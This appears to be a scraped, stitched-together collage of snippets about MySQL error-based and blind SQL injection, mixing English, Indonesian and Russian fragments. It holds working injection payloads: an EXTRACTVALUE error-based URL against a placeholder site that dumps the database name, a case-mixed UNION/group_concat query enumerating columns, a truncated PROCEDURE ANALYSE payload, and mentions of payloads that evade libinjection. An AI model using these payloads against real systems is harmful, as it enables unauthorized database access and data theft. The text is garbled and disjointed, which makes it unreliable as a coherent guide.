Description of Windows process: PsnLite.exePROCEDURE/**/ANALYSE(EXTRACTVALUE(8971,CONCAT(0x5c,0x4a357975,(SELECT/**/(ELT(2836=2836,1
www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select database())))-- Output : XPATH syntax error: ' database_name_here'. as we got the Database let us continue :D. Getting tables in current Database
As you can see, this request took 5 seconds, so SLEEP(5) succeeded. Here are the payloads from sqlmap which are currently not considered sqli by libinjection. They seem to gather around RLIKE, JSON_KEYS(), PROCEDURE ANALYSE(EXTRACTVALUE()) and EXP(~()).
Jika dilihat, terdapat pesan XPATH syntax error. Fungsi extractvalue() sendiri merupakan fungsi untuk ekstraksi (ambil data) dari string dalam format XML menggunakan notasi XPATH untuk query.
In the function procedure analyse() I found this crash while passing a sub query.
JS- утилиты, фреймворки → Syntax Highlighter [1215] PHP скрипты → Скрипт для проверки ...
Is this feature of MariaDB? Can i bypass this or it's impossible to use select in procedure analyse in MariaDB server?
Prepending a full stop or a colon (we use the hex representation of 0x3a below) to the beginning of the XML query will ensure the parsing will always fail, thus generating an error with our extracted data.
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]. There is a different way to discover this data on every different database, but it's always the same methodology.
Analysing the requests. With these requests, we observe that a boolean-blind injection seems to have worked.